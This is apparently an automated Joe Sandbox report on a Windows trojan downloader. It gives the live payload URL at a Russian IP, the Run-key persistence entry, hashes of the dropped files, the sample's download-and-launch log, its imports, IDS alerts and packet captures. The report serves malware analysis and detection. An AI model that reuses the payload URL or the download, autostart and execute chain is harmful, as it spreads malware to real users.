                                                              http://84.201.150.223/sh-runner.exeTSecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe, 00000000.00000002.1816496267.00000223D2E2F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://84.201.150.223/Ksh-runner.exe, 00000004.00000002.3055154442.00000112CF5D5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  unknown
                                                                  • No. of IPs < 25%
                                                                  • 25% < No. of IPs < 50%
                                                                  • 50% < No. of IPs < 75%
                                                                  • 75% < No. of IPs
                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                  84.201.150.223
                                                                  unknownRussian Federation
                                                                  200350YANDEXCLOUDRUtrue
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1521496
                                                                  Start date and time:2024-09-28 17:51:08 +02:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 5m 53s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Number of analysed new started processes analysed:13
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
                                                                  Detection:MAL
                                                                  Classification:mal96.troj.evad.winEXE@9/5@0/1
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 100%
                                                                  • Number of executed functions: 35
                                                                  • Number of non-executed functions: 128
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 41.63.96.128
                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, d.3.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.8.0.4.0.0.3.0.1.3.0.6.2.ip6.arpa, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                  • VT rate limit hit for: SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
                                                                  TimeTypeDescription
                                                                  16:52:16AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run MyProgram C:\ProgramData\sh-runner.exe
                                                                  16:52:24AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run MyProgram C:\ProgramData\sh-runner.exe
                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  84.201.150.223SecuriteInfo.com.Win64.MalwareX-gen.15798.11018.exeGet hashmaliciousMetasploitBrowse
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    windowsupdatebg.s.llnwi.nethttp://telesexprivatexx.vercel.app/Get hashmaliciousPorn ScamBrowse
                                                                    • 41.63.96.0
                                                                    http://atttew.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 46.228.146.128
                                                                    https://meettamask-logiinii.gitbook.io/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 87.248.205.0
                                                                    https://att-104249.weeblysite.com/Get hashmaliciousUnknownBrowse
                                                                    • 87.248.204.0
                                                                    http://aaqoalwsmendufy.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 87.248.202.1
                                                                    http://layanan-customer-danaid.dankz.my.id/Get hashmaliciousUnknownBrowse
                                                                    • 87.248.204.0
                                                                    https://bhy.srl.mybluehost.me/SBB/index/Get hashmaliciousUnknownBrowse
                                                                    • 87.248.205.0
                                                                    http://pttroqtr.top/helpGet hashmaliciousUnknownBrowse
                                                                    • 87.248.205.0
                                                                    https://uphold-login-un.godaddysites.com/Get hashmaliciousUnknownBrowse
                                                                    • 178.79.238.128
                                                                    http://ikwmasoledrbwys.weebly.com/Get hashmaliciousHTMLPhisherBrowse
                                                                    • 87.248.205.0
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    YANDEXCLOUDRUSecuriteInfo.com.Win64.MalwareX-gen.15798.11018.exeGet hashmaliciousMetasploitBrowse
                                                                    • 84.201.150.223
                                                                    http://xn--r1a.website/s/ogorodruGet hashmaliciousUnknownBrowse
                                                                    • 130.193.42.23
                                                                    http://vidaliaonion.orgGet hashmaliciousUnknownBrowse
                                                                    • 130.193.53.230
                                                                    Vt5wr1Hj3H.elfGet hashmaliciousMiraiBrowse
                                                                    • 178.154.229.200
                                                                    https://faq-kak.ru/kak-najti-svoyu-biblioteku-v-steam/Get hashmaliciousUnknownBrowse
                                                                    • 130.193.58.13
                                                                    loligang.arm7.elfGet hashmaliciousMiraiBrowse
                                                                    • 84.201.130.205
                                                                    http://paypal.6887xyyz.biz.id/Get hashmaliciousUnknownBrowse
                                                                    • 130.193.53.144
                                                                    file.exeGet hashmaliciousRaccoon Stealer v2, RedLine, SmokeLoaderBrowse
                                                                    • 130.193.51.105
                                                                    file.exeGet hashmaliciousDarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoaderBrowse
                                                                    • 130.193.51.105
                                                                    file.exeGet hashmaliciousDarkTortilla, Glupteba, Raccoon Stealer v2, RedLine, SmokeLoaderBrowse
                                                                    • 130.193.51.105
                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                    72a589da586844d7f0818ce684948eeaSecuriteInfo.com.Win64.Evo-gen.19321.5552.exeGet hashmaliciousUnknownBrowse
                                                                    • 84.201.150.223
                                                                    SecuriteInfo.com.Win64.MalwareX-gen.15798.11018.exeGet hashmaliciousMetasploitBrowse
                                                                    • 84.201.150.223
                                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 84.201.150.223
                                                                    KTh1gQlT9a.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 84.201.150.223
                                                                    file.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 84.201.150.223
                                                                    YPDi0gRMHU.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 84.201.150.223
                                                                    CNpQfI8eIT.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 84.201.150.223
                                                                    6NlY2E3Wqi.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 84.201.150.223
                                                                    4EtLXn5pqI.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 84.201.150.223
                                                                    RWcyVDbMGQ.exeGet hashmaliciousSmokeLoaderBrowse
                                                                    • 84.201.150.223
                                                                    No context
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
                                                                    File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1169665
                                                                    Entropy (8bit):6.512528295738881
                                                                    Encrypted:false
                                                                    SSDEEP:24576:xm360uIhQFmq6XxxlFLRsY2TunLczsEsffWOpc8Ip/Q4k73zs/41kesms:xmK0ThQFmFLRD2TuAHsXW/8Ipo3zs/4m
                                                                    MD5:D178CD15E8E69662A943BF0A9DA7FF60
                                                                    SHA1:13475DFB0075D3ADC31AC02B8DC10DEC3C3E84E9
                                                                    SHA-256:482A86391842A2B869FFD38AF0DBFA96DE7501A92986E644B54D8AE731BDAF64
                                                                    SHA-512:65A7F7FC0613F8C773D3B8627D53ABB51E708F666986938B28BC4A8689FA63B32B9565B8B00973D8EB82416F1DB486AF8948FD88771C51C341C95E5AC6F4F841
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 39%
                                                                    Reputation:low
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.6........&....+.....2.................@..........................................`... ..............................................P............... ..Xb..............................................(...................xV...............................text...............................`..`.data...............................@....rdata...E.......F..................@..@.pdata..Xb... ...d..................@..@.xdata..\............\..............@..@.bss.........@...........................idata.......P......................@....CRT....h....p.......$..............@....tls.................&..............@....reloc...............(..............@..B................................................................................................................................................................................................................
                                                                    Process:C:\ProgramData\sh-runner.exe
                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                    Category:dropped
                                                                    Size (bytes):71954
                                                                    Entropy (8bit):7.996617769952133
                                                                    Encrypted:true
                                                                    SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                    MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                    SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                    SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                    SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                    Malicious:false
                                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                    Process:C:\ProgramData\sh-runner.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):290
                                                                    Entropy (8bit):2.953254816618974
                                                                    Encrypted:false
                                                                    SSDEEP:6:kK+KPL9Usw9L+N+SkQlPlEGYRMY9z+4KlDA3RUe/:tPiD9LNkPlE99SNxAhUe/
                                                                    MD5:373BCF3B8F5B395880F73468DA88E65E
                                                                    SHA1:86731946C021251D66731954C0DC7A67393F3F2C
                                                                    SHA-256:6B15EE068E7878D755280DEAC743642012D3310EC444A52586BD9758909FE608
                                                                    SHA-512:431930393FF7FC1E6CAC154E9E1930D2096049FB0365F1022653C69ED6F3DA4F5E3EE1FA3FFE450E72B06E068A71696391EC48F1F3780DD64633B34ADD47DFBC
                                                                    Malicious:false
                                                                    Preview:p...... ......../$.d....(....................................................... ........G..@.......................h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
                                                                    File Type:PE32+ executable (console) x86-64 (stripped to external PDB), for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):1169665
                                                                    Entropy (8bit):6.512528295738881
                                                                    Encrypted:false
                                                                    SSDEEP:24576:xm360uIhQFmq6XxxlFLRsY2TunLczsEsffWOpc8Ip/Q4k73zs/41kesms:xmK0ThQFmFLRD2TuAHsXW/8Ipo3zs/4m
                                                                    MD5:D178CD15E8E69662A943BF0A9DA7FF60
                                                                    SHA1:13475DFB0075D3ADC31AC02B8DC10DEC3C3E84E9
                                                                    SHA-256:482A86391842A2B869FFD38AF0DBFA96DE7501A92986E644B54D8AE731BDAF64
                                                                    SHA-512:65A7F7FC0613F8C773D3B8627D53ABB51E708F666986938B28BC4A8689FA63B32B9565B8B00973D8EB82416F1DB486AF8948FD88771C51C341C95E5AC6F4F841
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: ReversingLabs, Detection: 39%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.6........&....+.....2.................@..........................................`... ..............................................P............... ..Xb..............................................(...................xV...............................text...............................`..`.data...............................@....rdata...E.......F..................@..@.pdata..Xb... ...d..................@..@.xdata..\............\..............@..@.bss.........@...........................idata.......P......................@....CRT....h....p.......$..............@....tls.................&..............@....reloc...............(..............@..B................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):222
                                                                    Entropy (8bit):4.917948116227102
                                                                    Encrypted:false
                                                                    SSDEEP:6:DQ8azNz+Ev9UVVrhWNQuGazNUIepcFiizNv:DMz4VrIiezGIxFiiz9
                                                                    MD5:F2EFC9C3111CCF2907BD961B10D4CCB0
                                                                    SHA1:57313B0E33B46AFE9BA15DE2AC7141501D2CA790
                                                                    SHA-256:E2B2C1B9F7D7C2B2E8B7C8BF64FEE65235C9BC32341F475AC80FCF372940E0E6
                                                                    SHA-512:054DB1081BE03AD4E1F29F8CEE1243C1D9A77ECDA38C2823E2623A7AE53E1D996878506924A47A3D0A0D5A493A4541A9C18677F1AA3684A0D67CD595EE83AD6D
                                                                    Malicious:false
                                                                    Preview:Saving file to: C:\ProgramData\sh-runner.exe..Starting download from: http://84.201.150.223/sh-runner.exe..File downloaded to: C:\ProgramData\sh-runner.exe..Added to startup...Launching file: C:\ProgramData\sh-runner.exe..
                                                                    File type:PE32+ executable (console) x86-64, for MS Windows
                                                                    Entropy (8bit):5.80327639091689
                                                                    TrID:
                                                                    • Win64 Executable Console (202006/5) 92.65%
                                                                    • Win64 Executable (generic) (12005/4) 5.51%
                                                                    • Generic Win/DOS Executable (2004/3) 0.92%
                                                                    • DOS Executable Generic (2002/1) 0.92%
                                                                    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                    File name:SecuriteInfo.com.Win32.Trojan-Downloader.Generic.9UTDDY.27958.1932.exe
                                                                    File size:250'094 bytes
                                                                    MD5:ccf3c480f27db238fa757d0967241817
                                                                    SHA1:8067f4e9093dd68fc54a2270c3e4aa6e2e442929
                                                                    SHA256:ab963f165c5269b14b0275a2b25f2e1110a7e3ca903324e106701a4167026270
                                                                    SHA512:31c468af4e4d1059fb3612ad6e40be09b98124b548b343d2fce794400cdcc423f25b38ce588732d7d85e995f27f676154f6ea5dbfeba684a6853f0cf1ecfcd80
                                                                    SSDEEP:3072:SX7Hcsrt6MZso134/OdfYIak6wJjTpY418PWZ8m1X4VQai0auFtE4IhRZgI+mB1V:4Hxpsc4ejak6wZQ3pWB1rp
                                                                    TLSH:90346BC5BBC5ACEBC6054636889F43693738F6D117839B271D3872351E27AD0BE8B246
                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......f.$........&....+.r.....................@.....................................C....`... ............................
                                                                    Icon Hash:90cececece8e8eb0
                                                                    Entrypoint:0x1400013f0
                                                                    Entrypoint Section:.text
                                                                    Digitally signed:false
                                                                    Imagebase:0x140000000
                                                                    Subsystem:windows cui
                                                                    Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LARGE_ADDRESS_AWARE
                                                                    DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
                                                                    Time Stamp:0x66F28CC4 [Tue Sep 24 09:56:20 2024 UTC]
                                                                    TLS Callbacks:0x400019e0, 0x1, 0x400019b0, 0x1
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:4
                                                                    OS Version Minor:0
                                                                    File Version Major:4
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:4
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:2e8e33a2fc5c0b8dca8ebc8bd69833ed
                                                                    Instruction
                                                                    dec eax
                                                                    sub esp, 28h
                                                                    dec eax
                                                                    mov eax, dword ptr [00009545h]
                                                                    mov dword ptr [eax], 00000000h
                                                                    call 00007F6BE0B3515Fh
                                                                    nop
                                                                    nop
                                                                    dec eax
                                                                    add esp, 28h
                                                                    ret
                                                                    nop dword ptr [eax]
                                                                    dec eax
                                                                    sub esp, 28h
                                                                    call 00007F6BE0B3BF0Ch
                                                                    dec eax
                                                                    cmp eax, 01h
                                                                    sbb eax, eax
                                                                    dec eax
                                                                    add esp, 28h
                                                                    ret
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    dec eax
                                                                    lea ecx, dword ptr [00000009h]
                                                                    jmp 00007F6BE0B353B9h
                                                                    nop dword ptr [eax+00h]
                                                                    ret
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    nop
                                                                    push ebp
                                                                    mov eax, 00001060h
                                                                    call 00007F6BE0B368DAh
                                                                    dec eax
                                                                    sub esp, eax
                                                                    dec eax
                                                                    lea ebp, dword ptr [esp+00000080h]
                                                                    dec eax
                                                                    mov dword ptr [ebp+00000FF0h], ecx
                                                                    dec eax
                                                                    mov dword ptr [ebp+00000FF8h], edx
                                                                    dec eax
                                                                    mov eax, dword ptr [ebp+00000FF0h]
                                                                    dec eax
                                                                    mov edx, eax
                                                                    dec eax
                                                                    lea eax, dword ptr [00008B7Bh]
                                                                    dec eax
                                                                    mov ecx, eax
                                                                    call 00007F6BE0B3BFE8h
                                                                    mov dword ptr [esp+20h], 00000000h
                                                                    inc ecx
                                                                    mov ecx, 00000000h
                                                                    inc ecx
                                                                    mov eax, 00000000h
                                                                    mov edx, 00000001h
                                                                    dec eax
                                                                    lea eax, dword ptr [00008B6Fh]
                                                                    dec eax
                                                                    mov ecx, eax
                                                                    dec eax
                                                                    mov eax, dword ptr [0000CF91h]
                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0xe0000x8f0.idata
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0xb0000x474.pdata
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x110000x84.reloc
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0xa2000x28.rdata
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0xe2700x1f8.idata
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x71280x7200d98c809291cb2d8479f4665a1e010733False0.5814830043859649data6.252730100417784IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                    .data0x90000xc00x200b59a3d526c198fbd9c18d77c1719044cFalse0.146484375data0.8974525018731327IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .rdata0xa0000xf600x1000bebd663d09a99bc640fe8016275af4ddFalse0.313720703125data4.6982313747152125IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .pdata0xb0000x4740x6007bc7d857dfcb4b84fb5ff645b59e8b42False0.4127604166666667data3.35870342166892IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .xdata0xc0000x4380x600a2bc8b52ffacce06414e4549df6454b2False0.2740885416666667data3.5066608679489093IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                    .bss0xd0000xb800x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .idata0xe0000x8f00xa001f9b7bf9a6229d156fd1700931e1f773False0.335546875data3.7139386224408053IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .CRT0xf0000x600x200fb96f62ea2a8e27523f57d4e54a3b3f2False0.068359375data0.28655982431271465IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .tls0x100000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                    .reloc0x110000x840x20091642fa450a154600c9d45be3f45a381False0.251953125data1.5082210387070034IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    /40x120000x6200x800e70b47b266b9de6df73db7aa96f68411False0.181640625data1.463451915129665IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    /190x130000x1207c0x12200307e054b2dfb16605ce7f3060e7370acFalse0.423828125data5.788144327604367IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    /310x260000x321c0x3400335de062d2872a1053913069789fc304False0.24466646634615385data4.77587302511516IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    /450x2a0000x6d6d0x6e003fe4dd2735c2cfdea1bc4b20463272e7False0.5142755681818182data5.051792905393766IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    /570x310000x16c00x1800b724d274feec9d30bbd06520a62b6d0bFalse0.2882486979166667data4.425321557333535IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    /700x330000x39d0x4007525f1145b47b06d73d7667bb1386b5fFalse0.435546875data4.6233906248986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    /810x340000x15fa0x1600b15394a328eca738bc353b3ca53f2a1eFalse0.16352982954545456data4.685680000488948IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    /970x360000x78250x7a0055d8fd851ce8c104fa85ae82a803b030False0.5157210553278688data5.811022996425546IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    /1130x3e0000x52b0x600c8f735d4379e14fc5ae61b34491dffc7False0.63671875data5.310144103808594IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                    DLLImport
                                                                    ADVAPI32.dllRegCloseKey, RegOpenKeyA, RegSetValueExA
                                                                    KERNEL32.dllDeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery, WideCharToMultiByte
                                                                    msvcrt.dll__C_specific_handler, ___lc_codepage_func, ___mb_cur_max_func, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _errno, _fmode, _initterm, _lock, _onexit, _unlock, abort, calloc, exit, fclose, fopen, fprintf, fputc, free, fwrite, localeconv, malloc, memcpy, memset, signal, strerror, strlen, strncmp, vfprintf, wcslen
                                                                    SHELL32.dllSHGetFolderPathA, ShellExecuteA
                                                                    WININET.dllInternetCloseHandle, InternetOpenA, InternetOpenUrlA, InternetReadFile
                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2024-09-28T17:52:15.584063+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44973184.201.150.2238443TCP
                                                                    2024-09-28T17:52:26.916639+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44973484.201.150.2238443TCP
                                                                    2024-09-28T17:52:34.436379+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974284.201.150.2238443TCP
                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Sep 28, 2024 17:52:12.399903059 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:12.405083895 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:12.405158043 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:12.405299902 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:12.410661936 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.120754957 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.120820045 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.120980024 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.121052980 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.121207952 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.121223927 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.121243000 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.121251106 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.121267080 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.121268034 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.121283054 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.121285915 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.121299982 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.121304035 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.121325016 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.121325016 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.121335983 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.121342897 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.121362925 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.121381998 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.134938955 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.134955883 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.134998083 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.135040045 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.135364056 CEST804973084.201.150.223192.168.2.4
                                                                    Sep 28, 2024 17:52:13.135416031 CEST4973080192.168.2.484.201.150.223
                                                                    Sep 28, 2024 17:52:13.254710913 CEST804973084.201.150.223192.168.2.4
